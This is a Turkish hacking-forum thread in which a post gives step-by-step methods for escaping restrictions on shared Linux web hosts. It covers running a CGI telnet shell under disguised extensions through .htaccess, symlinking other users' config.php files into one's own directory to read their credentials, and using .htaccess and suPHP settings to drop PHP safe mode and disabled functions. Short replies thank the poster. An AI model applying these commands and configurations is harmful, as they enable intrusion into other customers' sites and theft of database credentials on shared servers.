Linux Server Bypass

K

Kzsg

Guest
S.A. arkadaşlar
bugün sizlere Linux serverlarda yapabileceğimiz ByPass yollarından bir kaçını anlatacağım.

Bildiginiz gibi serverların Safe Mod durumlarında (On) komut çalıştırmak için farklı materyaller kullanırız

Bunlardan en çok kullandığımız Cgi-Telnet ’tir.

Aracımızın dosya uzantısı .pl olduğundan dolayı serverda Active-Perl kurulumu olup online işlem yapması gerekmektedir.

1)Cgi-Telnet’i farklı uzantılarda çalıştırmak.

Cgi-Telnet’i .htaccess ile farklı uzantılar şeklinde çalışarak kurulu olmyan paketten dolayı bypass yöntemine başvururuz.

Uzantıyı (.gif) yapıp çalıştırmak.

/home/ajanlar/public_html/ dizininde bu işlemi yapmak için

.htaccess kodu ;

AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif

bu şekilde ki bir .htaccess de telnet’imiz “.pl” olan uzantısı “.gif” yapıp chmod 755 vererek çalıştırabiliriz.

Ve de Telnet’imizde 1. satırda ;

#!/usr/bin/perl
olan betiğimizi ;
“#!/usr/bin/perl -I/usr/local/bandmain” bu şekilde silerek değiştiriniz.

Yukarda verdiğim kodun içeriğini ;

AddType applicationx-httpd-cgi .snl

AddHandler cgi-script .snl
AddHandler cgi-script .snl

bu şekildede değiştirerek “.pl” olan uzantımızı “.snl” şeklindede değiştirebiliriz.

2)”Ln -s” ile Dosyayı Kendi KLasörünüze Çekmek

Yukarda ki gibi Cgi-Telnet imizi çalıştırdıktan sonra

ahmet isimli userin dizininden config dosyasını kendi dizinimize çekmek için

ln -s /home/snl/public_html/config.php /home/ajanlar/public_html/snl.txt

şeklinde çekersek dizindeki config.php direk snl.txt içeriğine kopyalanacaktır.

Ln komutunun yetkisinin olmadığı zamanda ?

herhangi bir Linux dağıtılımında /bin klasorunde ln dosyasını

çalıştığınız dizine upload ederek chmod 755 yetkisinden sonra

./ln /home/snl/public_html/config.php /home/ajanlar/public_html/snl.txt

şeklindede çekebilirsiniz.

Bu yöntem yanında cat -n komutunuda kullanabilirsiniz.

3)Dizini Direk Çekerek Php Parsed

Şimdi anlatacağım yöntem ise hedef dizinin ana klasörünü direk kendi dizininize çekerek vereceğim .htaccess komudu

ile dizinde Php parsed yaparak dosyayı download ettirmek.

Komut 1;

Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php

Komut 2; .shtml parsed

Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml

ln -s /home/snl/public_html/ /home/ajanlar/public_html/

komutundan sonra çalıştığınız shell in url si

http://ajanlar.org ise

http://ajanlar.org/config.php url girdiginiz zaman

direk config.php yi masaüstünüze indirebilirsiniz.

4)Dizin’i Görmek

Çektiğiniz klasor ise ve direk çalışmasını istiyorsanız

.htaccess ’inizi

Komut 1;

#deny all access
deny from all

Komut 2;

Options +Indexes +MultiViews +FollowSymlinks

IndexOptions FancyIndexing

Kullanabilirsiniz.

5)Php Versiyon Düşürmek

Serverın Php versiyonunu düşürmek istiyorsanız.

.htccess komutu ;

AddType application/x-httpd-php5 .php

kullanabilirsiniz php4 de çalışan sheller sayasendi safe mod durumunu bypasslıyabilirsiniz.

6)suPHP Kullanarak Dizinde Çalışmayan .htaccess Çalıştırmak.

Çalıştığınız dizinde .htaccess çalışmıyorsa ;

suPHP_ConfigPath /home/ajanlar/public_html/php.ini

Şeklinde php.ini nizi çalıştırarak Safe Mod , Disab. Fonk. düşürebilirsiniz.

Bunun gibi bir çok yöntem var ve mantıklarının hepsi birbirine yakındır.

Sizinde eklemek istediniz bypass yontemi war ise ekleyebilirsiniz



ALINTI
 

Fanetsa

Moderator
Katılım
22 Nis 2013
Mesajlar
2,106
Tepkime puanı
0
Puanları
0
Yaş
33
ajanlarda denemeyin ha :SDADA
 

G3nzo

Moderator
Katılım
20 Eyl 2012
Mesajlar
1,992
Tepkime puanı
0
Puanları
36
:) kim yazmışsa hepsini okumadım ama bir kaç yere baktım yenilere faydalı olucak bir konu telnet i mutlaka öğrenin :D
 

UsturaHacker

Forumdan Uzaklaştırıldı
Katılım
18 Ağu 2013
Mesajlar
59
Tepkime puanı
0
Puanları
0
Hic bisey anlamadim
 

MassCrew

Prof Spys-z
Katılım
21 Nis 2013
Mesajlar
1,116
Tepkime puanı
0
Puanları
0
Yaş
27
eywallah
 

c43s4r

Yeni Üye
Katılım
28 Ocak 2017
Mesajlar
175
Tepkime puanı
0
Puanları
0
eywallah
 
Üst
Copyright® Ajanlar.org 2012